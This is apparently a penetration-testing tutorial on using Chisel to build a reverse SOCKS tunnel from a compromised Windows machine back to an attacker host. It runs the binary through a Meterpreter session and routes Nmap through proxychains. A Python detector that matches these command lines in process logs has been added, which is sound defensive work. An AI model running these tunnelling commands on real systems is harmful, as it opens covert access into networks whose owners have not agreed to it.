What is Chisel?

Chisel is a TCP/UDP tunnelling tool written in Go (golang). Network traffic is transported over HTTP, but the connection is secured via SSH. Chisel was primarily built to pass network traffic through firewalls; however, it is also used to provide access to endpoints within a network, making it ideal for pivoting.

How to use Chisel?

The tool operates on a client/server model, meaning the roles need to be defined on each endpoint for successful data transfer and communication. This can be achieved by uploading and running the different pre-made binaries along with the appropriate flags for the command.

Chisel offers several options, including forwarding individual ports to and from an endpoint in the same way as traditional SSH port forwarding. However, the most efficient method we have established is to create a reverse SOCKS proxy, which makes all ports on the target network usable.

Link for the pre-made binaries: https://github.com/jpillora/chisel/releases

Reverse Proxy Instructions

1. On the attacker's machine: ./chisel_1.7.6_linux_amd64 server -p 9854 --reverse

2. On the victim machine (Windows): .\chisel_1.7.6_windows_amd64.exe client <attacker IP>:<listening port> R:socks

Uploading Chisel via Meterpreter

When using Meterpreter to upload and run Chisel, you may encounter an issue when attempting to run the binary on the victim machine. To overcome any issue when interacting with Meterpreter, it is advised to drop into a CMD shell and use the CMD command "start". See below for a walkthrough:

1. Upload Chisel through the Meterpreter session using the "upload <file path>" command

2. Drop into CMD shell using the command "shell"

3. Run the following command within CMD "start chisel_1.7.6_windows_amd64.exe client <attacker IP>:<listening port> R:socks"
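
For defenders, the server and client command lines shown above have a recognisable argument shape that can be matched in process-creation logs. The following is an added example, not part of the original post or the Chisel project; the function names and the sample events are constructed for illustration.

```python
import re
import shlex

# Chisel server address as typed on the client: host:port, optionally with a scheme.
SERVER_ADDR = re.compile(r"^(?:https?://)?[\w.\-]+:\d{1,5}$")

def classify(cmdline):
    """Return a finding for a Chisel-style reverse tunnel command line, else None.

    Matching is on argument shape, not file name, so a renamed binary still hits.
    """
    try:
        toks = shlex.split(cmdline, posix=False)  # posix=False keeps Windows backslashes
    except ValueError:                            # unbalanced quotes in the log field
        toks = cmdline.split()
    toks = [t.strip('"') for t in toks]
    for i, tok in enumerate(toks):
        rest = toks[i + 1:]
        if tok == "server" and "--reverse" in rest:
            port = next((rest[j + 1] for j, t in enumerate(rest[:-1])
                         if t in ("-p", "--port")), None)
            return {"role": "server", "port": port}
        if tok == "client":
            addr = next((t for t in rest if SERVER_ADDR.match(t)), None)
            remotes = [t for t in rest if t.startswith("R:")]  # reverse remotes
            if addr and remotes:
                return {"role": "client", "server": addr,
                        "remotes": remotes, "socks": "R:socks" in remotes}
    return None

# Constructed process-creation command lines (203.0.113.10 is a documentation address).
SAMPLE_EVENTS = [
    r".\chisel_1.7.6_windows_amd64.exe client 203.0.113.10:9854 R:socks",
    r"cmd.exe /c start svc.exe client 203.0.113.10:9854 R:socks",  # renamed binary
    "./chisel_1.7.6_linux_amd64 server -p 9854 --reverse",
    r"C:\Windows\System32\ssh.exe -R 1080 user@203.0.113.10",      # not Chisel
    "python3 -m http.server 8000",                                 # not Chisel
]

def scan(events):
    """Return (command line, finding) pairs for every event that matches."""
    return [(e, f) for e in events if (f := classify(e))]

if __name__ == "__main__":
    for event, finding in scan(SAMPLE_EVENTS):
        print(finding, "<-", event)
```

Because the tunnel itself rides over HTTP, the process command line is often an easier place to spot it than the network traffic.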

Using Chisel with Proxychains/SOCKS Proxy

To use other locally installed tools with Chisel when using the reverse proxy, you must configure proxychains4.conf, found in the following location on Linux hosts:

· /etc/proxychains4.conf

Please note the SOCKS proxy entry should be made at the bottom of the config file.

Once the entry is configured to match the details from the Chisel command, you can route other tools through the proxy via the proxychains command line. For example, when using Nmap you would use the following command:

· "proxychains nmap -sT -sV <target>"